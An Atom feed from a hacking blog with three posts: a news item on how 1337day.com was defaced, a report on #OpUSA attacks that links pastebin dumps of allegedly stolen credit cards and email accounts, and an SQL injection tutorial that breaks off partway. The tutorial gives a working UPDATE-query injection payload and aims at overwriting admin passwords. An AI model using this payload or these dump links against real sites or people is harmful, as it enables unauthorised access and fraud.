<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;DEABSHw8fip7ImA9WhBbGEg.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062</id><updated>2013-05-17T22:59:19.276-07:00</updated><category term="Youtube hacks" /><category term="Registry hacks" /><category term="Security Training" /><category term="Security flaws" /><category term="Unix Hacking" /><category term="Footprinting" /><category term="Orkut hacking" /><category term="Duqu" /><category term="Wordpress Security" /><category term="contests" /><category term="Xp tricks" /><category term="VOIP Hacking" /><category term="Google hacks" /><category term="iPhone Hacking" /><category term="Hack Facebook" /><category term="Hacking News" /><category term="My space hacks" /><category term="Website hacking" /><category term="Backtrack 5" /><category term="Computer hacking" /><category term="sql injection" /><category term="Sponsored Reivews" /><category term="Skype" /><category term="PTC Hacking" /><category term="Themes" /><category term="OWASP" /><category term="Network Security" /><category term="bug bounty" /><category term="Parental Control softwares" /><category term="Hardware keyloggers" /><category term="Joomla Security" /><category term="Password Hacking softwares" /><category term="USB Hacking" /><category term="Interviews" /><category term="Cheat and tricks" /><category term="Security Tools" /><category term="Wireless Security" /><category term="Blogging tips" /><category term="Hotmail hacks" /><category term="Russian Crimewares" /><category term="xss" /><category term="swf vulnerabilities" /><category term="Intermediate Hacking" /><category term="Whitepapers" /><category term="DOM XSS" /><category term="facebook" /><category term="Email hacking" /><category term="Msn hacks" /><category term="botnets" /><category term="Counter Strike Cheats" /><category term="Rafay Baloch Books" /><category term="Others" /><category term="Twitter hacks" /><category term="videos" /><category term="Metasploit" /><category term="Ip address" /><category term="Stuxnet" /><category term="Password Cracking" /><category term="Password recovery" /><category term="Gmail hacks" /><category term="Hack Yahoo" /><category term="Windows 7 hacks" /><category term="Rapidshare hacks" /><category term="Hacking Tools" /><category term="Windows performance tips" /><category term="android" /><category term="Hacking basics" /><category term="Hi5 hacks" /><category term="Webserver Security" /><category term="Hacking Windows" /><category term="Security tips" /><category term="Telecom Hacking" /><category term="Anonymous web surfing" /><category term="Orkut tricks" /><category term="Data Recovery" /><category term="Capture The Flag" /><category term="Reverse Engineering" /><category term="Cracks and Keygens" /><category term="Cellphone hacks" /><category term="Reverting" /><category term="Viruses" /><category term="Data Hiding" /><category term="Browser Exploitation" /><title type="text">Ethical Hacking - Rafayhackingarticles</title><subtitle type="html">Learn How to hack!Get hacking and security tips from expert,Protect yourself from hackers</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://www.rafayhackingarticles.net/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>497</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/HackingAndCracking" /><feedburner:info uri="hackingandcracking" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><link rel="license" type="text/html" href="http://creativecommons.org/licenses/by/3.0/" /><logo>http://2.bp.blogspot.com/_fMrF3L8CTmg/S-RW1j1FO1I/AAAAAAAAAbA/0fqDhYt8DLM/S700/RafayHackingarticles+logo.JPG</logo><feedburner:emailServiceId>HackingAndCracking</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><entry gd:etag="W/&quot;D0QCRXY4fCp7ImA9WhBbF04.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-9121876146837189017</id><published>2013-05-16T13:16:00.001-07:00</published><updated>2013-05-16T13:16:04.834-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-16T13:16:04.834-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News" /><title>How Was 133day.com Hacked?</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
Today, in the morning when i browsed to &lt;b&gt;1337day.com&lt;/b&gt; (The famous exploit buying/selling database), I was shocked to see 1337day defaced by famous turkish hacker group named &lt;b&gt;"Turkguvenligi"&lt;/b&gt;, In past&amp;nbsp;Turkguvenligi has been responsible for defacements of lots of famous websites. Here is what appeared when i came across 1337day.com&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-27Qk6dRrW7o/UZU2wtuqkOI/AAAAAAAAC0I/434o8NsW8r4/s1600/BKVvp5ICEAEb4-x+(1).png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="334" src="http://3.bp.blogspot.com/-27Qk6dRrW7o/UZU2wtuqkOI/AAAAAAAAC0I/434o8NsW8r4/s640/BKVvp5ICEAEb4-x+(1).png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;On their defacement page, they told that they had asked 1337day to ban a fake user with author id =5819 but they refused to do so, As i browsed to&amp;nbsp;&lt;b&gt;http://www.1337day.com/author/5819&lt;/b&gt;, i website was first appeared to be inaccessible, later it showed the following message:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-EGDqX6O5S5I/UZU4sN0RrnI/AAAAAAAAC0Y/0AhybVvxy7k/s1600/Untitled1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="162" src="http://2.bp.blogspot.com/-EGDqX6O5S5I/UZU4sN0RrnI/AAAAAAAAC0Y/0AhybVvxy7k/s640/Untitled1.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
However, i used their mirror site 1337day.org to access the author link, Here is the screenshot:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-7vl9LQbA4fk/UZU5wRZyqnI/AAAAAAAAC0o/DMTQ0EGnFYM/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="342" src="http://2.bp.blogspot.com/-7vl9LQbA4fk/UZU5wRZyqnI/AAAAAAAAC0o/DMTQ0EGnFYM/s640/Untitled.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
By looking at the author name &lt;b&gt;"Agd_Scorp"&lt;/b&gt;, i understood the whole point of the dispute, &lt;b&gt;Agd_Scorp &lt;/b&gt;is a well known hacker and founding member of "Turkguvenligi", He is responsible for lots of high profile defacements, If you take a look at his Zone-h record, it's pretty impressive, he has history of hacking into domain registrars.&lt;br /&gt;
&lt;br /&gt;
It appears to me that some known was submitting exploits with the name of Agd_Scorp, They asked 1337day team to remove it, however they refused to remove it. Therefore they defaced their website.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;How was 1337day.com hacked?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
There have been issues in the past where 1337day, injectors etc and their mirror websites were hacked, but in all of those cases, their servers were never compromised, it was their domain registrar&amp;nbsp;Moniker.com, which got compromised by the attackers.&lt;br /&gt;
&lt;br /&gt;
The attackers, compromised moniker.com and changed their dns servers to their own dns servers, a story matching &lt;a href="http://www.rafayhackingarticles.net/2012/11/how-google-pakistan-was-hacked.html" target="_blank"&gt;Google Pakistan hack&lt;/a&gt;, The 1337day team later confirmed on their facebook that their domain registrar was the victim of their attack not their DNS servers.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-rduVQMP8xIE/UZU8oXEJxJI/AAAAAAAAC04/Y7UxdN-5DvM/s1600/1337.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="242" src="http://1.bp.blogspot.com/-rduVQMP8xIE/UZU8oXEJxJI/AAAAAAAAC04/Y7UxdN-5DvM/s640/1337.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
They have also asked webmasters not to invent stories that their server was hacked. They say it's impossible, I don't agree with them on this point. Even most secure systems can be compromised.&lt;br /&gt;
&lt;br /&gt;
On performing a WHOIS lookup, I came to know that they have actually switched their hosting account from Moniker.com to hostgator.com&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-8MLCTIqiLxw/UZU9nnLSTOI/AAAAAAAAC1M/rQUOpK8TvkQ/s1600/Untitled11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="274" src="http://4.bp.blogspot.com/-8MLCTIqiLxw/UZU9nnLSTOI/AAAAAAAAC1M/rQUOpK8TvkQ/s640/Untitled11.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I have confirmed with hostgator that the dns servers for websitewelcome belong to them. We, will update you as soon as we have more information.&amp;nbsp;&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e0ux2sEJrFc:ycmPsbQGGmc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e0ux2sEJrFc:ycmPsbQGGmc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e0ux2sEJrFc:ycmPsbQGGmc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=e0ux2sEJrFc:ycmPsbQGGmc:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=e0ux2sEJrFc:ycmPsbQGGmc:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/e0ux2sEJrFc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/9121876146837189017/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/05/how-was-133daycom-hacked.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9121876146837189017?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9121876146837189017?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/e0ux2sEJrFc/how-was-133daycom-hacked.html" title="How Was 133day.com Hacked?" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-27Qk6dRrW7o/UZU2wtuqkOI/AAAAAAAAC0I/434o8NsW8r4/s72-c/BKVvp5ICEAEb4-x+(1).png" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/05/how-was-133daycom-hacked.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0YGQ34zfip7ImA9WhBbEEw.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-6087721875125654319</id><published>2013-05-08T04:05:00.001-07:00</published><updated>2013-05-08T04:05:22.086-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-08T04:05:22.086-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking News" /><title>Anonymous Hackers Cause Significant Damage To Banking And Government Agencies</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-H4oHNguo9bQ/UYowr5qqAZI/AAAAAAAACys/qdi7yzdoo0g/s1600/967d3a1e5869cae4490e28b80ae2d53c.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-H4oHNguo9bQ/UYowr5qqAZI/AAAAAAAACys/qdi7yzdoo0g/s1600/967d3a1e5869cae4490e28b80ae2d53c.jpeg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
A collective of hacker groups planed to attack the websites of major government agencies and banks on May 7 to protest American foreign policy.&lt;br /&gt;
&lt;br /&gt;
For weeks, the groups, which include Anonymous, have used social media to publicize their planned operation, dubbed "#OpUSA."&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Experts from USA(to cover up things) say that the attack was not well-planned and focused. On the other hand, twitter is full of #OpUSA tweets which tells us a different story. The hacker groups have compromised a large number of targets which as either owned by US government or its residents.&lt;br /&gt;
&lt;br /&gt;
AnonGhost made a significant contribution to #OpUSA by taking down a large number of websites, emails, credit cards, etc. According to their pastebin post, hackers claim to hack-&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;
&lt;b&gt;&lt;i&gt;- More than 700 websites (http://pastebin.com/zftTrrrh)&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;- More than 10k American credit cards(http://pastebin.com/D4QCynHC)&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;- 1 lac email accounts which belong to US residents (http://www45.zippyshare.com/v/58998013/file.html) 4. - More than 5000 facebook accounts(http://pastebin.com/NRvmnYFe)&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;- More than 12k email accounts of USA (http://www11.zippyshare.com/v/39103082/file.html)&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The complete paste can be seen here&lt;b&gt;(http://pastebin.com/RSqKCd1N).&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
The list of hacked sites mostly include high profile government websites from Australia, Ministry of environment Dominica, government of Argentina, Philippines, NGOs, &amp;nbsp;universities and other educational institutions from Thailand &amp;nbsp;Brazil, Russia, Israel, USA, Canada, UK, Romania, and Italy.&lt;br /&gt;
&lt;br /&gt;
Most of the sites seem to be recovered but some of them are still now defaced, down or under maintenance.&lt;br /&gt;
&lt;br /&gt;
We managed to ask the leader of AnonOps "Mauritania Attacker", also responsible for lots of high profile defacements, the purpose and the cause of the #OPUSA.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;"I attack USA because they think that muslims are terrorist but the reality is that they themselves are the biggest terrorist and they declared war Against Islam and me as a Muslim i will stand against them even if i die "&lt;/b&gt; Mauritania Attacker said.&lt;br /&gt;
&lt;br /&gt;
Mauritania Attacker is the leader of AnonOPS, He played a major role inside #OPISRAEL, along with it he is also responsible for other high profile attacks on lots of other organizations.&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;
&lt;b&gt;&lt;i&gt;Note: RHA has no association with any of the hacktivists.&amp;nbsp;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;About The Author&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
Major Part of this article was contributed by a security researcher Deepanker Arora. Recently, He contributed an article on "&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/04/hacking-windows-servers-privilege.html" target="_blank"&gt;Hacking Windows Servers&lt;/a&gt;&lt;/b&gt;".&lt;br /&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FmTcplxS9F0:Qpvx17Z_HL8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FmTcplxS9F0:Qpvx17Z_HL8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FmTcplxS9F0:Qpvx17Z_HL8:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=FmTcplxS9F0:Qpvx17Z_HL8:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=FmTcplxS9F0:Qpvx17Z_HL8:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/FmTcplxS9F0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/6087721875125654319/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/05/anonymous-hackers-cause-significant.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6087721875125654319?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/6087721875125654319?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/FmTcplxS9F0/anonymous-hackers-cause-significant.html" title="Anonymous Hackers Cause Significant Damage To Banking And Government Agencies" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-H4oHNguo9bQ/UYowr5qqAZI/AAAAAAAACys/qdi7yzdoo0g/s72-c/967d3a1e5869cae4490e28b80ae2d53c.jpeg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/05/anonymous-hackers-cause-significant.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUIMQHs7eCp7ImA9WhBUFko.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8888596448950128805</id><published>2013-05-04T06:15:00.002-07:00</published><updated>2013-05-04T06:19:41.500-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-05-04T06:19:41.500-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection" /><title>SQL Injection With Update Query</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;!-- This HTML code has been optimized by http://www.iwebtool.com/html_optimizer --&gt; &lt;br /&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="background-color: white; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;img alt="SQL1.bmp" height="363" src="http://blog.mile2.com/wp-content/uploads/2012/03/SQL1.bmp" style="background-color: white; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px; padding: 10px;" width="400" /&gt;&lt;br /&gt;
We have wrote couple of&amp;nbsp;articles&amp;nbsp;discussing various techniques and attack vectors for SQL Injection, We have already discussed &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/02/sql-injection-basics-union-based.html" target="_blank"&gt;Basic SQL Injection With Union Based&lt;/a&gt;&lt;/b&gt;, &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/02/blind-sql-injection-detection-and.html" target="_blank"&gt;Blind SQL Injection&lt;/a&gt;&lt;/b&gt;, &lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/03/mysql-injection-time-based.html" target="_blank"&gt;Time Based SQL Injection&lt;/a&gt; &lt;/b&gt;and also discussed&lt;b&gt; &lt;a href="http://www.rafayhackingarticles.net/2013/02/solutions-related-to-sql-injection.html" target="_blank"&gt;common problems and their solutions related to SQL Injection&lt;/a&gt;&lt;/b&gt;. However, this time &lt;b&gt;Daniel Max&lt;/b&gt; a regular reader of RHA will discuss about exploiting SQL Injection with Update Query.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Most of the tutorials, You see on the web usually explains to use the &lt;b&gt;SELECT &lt;/b&gt;method in order to retrieve stuff from the database, But what if we wanted to update some thing that is already present in the database, &lt;b&gt;For example &lt;/b&gt;a MD5 hash, that we are not able to crack, In order to gain access to the admin panel, We would simply run a update query and it will automatically update the password. We recommend you to atleast read little bit about MYSQL from w3schools.com, before proceeding with this tutorial as this tutorial is not for complete beginners.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Requirements&lt;/b&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://addons.mozilla.org/En-us/firefox/addon/tamper-data/" rel="nofollow" target="_blank"&gt;Tamper Data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://portswigger.net/burp/" rel="nofollow" target="_blank"&gt;Burp Suite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Know how of MySQL &lt;b&gt;(w3schools.com recommended)&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
So, Below is a screenshot of the form which we want to update, What we want to update is the Email address with our SQL Injection.&lt;br /&gt;
&lt;a href="http://www.zaslike.com/files/gnjwupwgtr2tzjd0d0n7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" src="http://www.zaslike.com/files/gnjwupwgtr2tzjd0d0n7.jpg" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Vulnerable parameter is &lt;b&gt;"E-mail format: " &lt;/b&gt;value.We would use&lt;b&gt; Tamper data &lt;/b&gt;to intercept and change the values.&lt;br /&gt;
&lt;br /&gt;
Here is a screenshot:&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.zaslike.com/files/glxns7kbo43dvgkxfx7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="496" src="http://i.imm.io/145na.jpeg" width="577" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
After we click ok we get an error the following error:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/uxjirugnl9o93hczvw7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="382" src="http://i.imm.io/145rM.jpeg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
First we want to find the exact database version, but what would be the easiest way.&lt;br /&gt;
&lt;br /&gt;
We can set value for other parameters, MySQL will let us do that as long as that parameter is one of UPDATE query parameters. We will use &lt;b&gt;"fname" &lt;/b&gt;, which is string value. Database query output will be shown inside &lt;b&gt;"First name" &lt;/b&gt;input box (where it says&lt;b&gt; MaXoNe&lt;/b&gt;).&lt;br /&gt;
&lt;br /&gt;
Screenshot of version query:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/rq10im4pbxlq9z28njt.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="498" src="http://i.imm.io/145sB.jpeg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Screenshot of the rendered content with database answer:&lt;br /&gt;
&lt;br /&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/1fif52vla855ltbf8wp7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="577" src="http://www.zaslike.com/files/1fif52vla855ltbf8wp7.jpg" width="518" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/b9z4c7k624xoe4ll3ft.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/81icqfwuctjcrb135mb7.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.zaslike.com/files/hbljoowgdmizjojyxg.jpg" style="margin-left: 1em; margin-right: 1em;" target="_blank"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now that we know how to create our query, lets get the tables.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Full query: &lt;u&gt;html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone =&lt;/u&gt;&lt;/b&gt;&lt;u&gt; '&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Tables Query:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
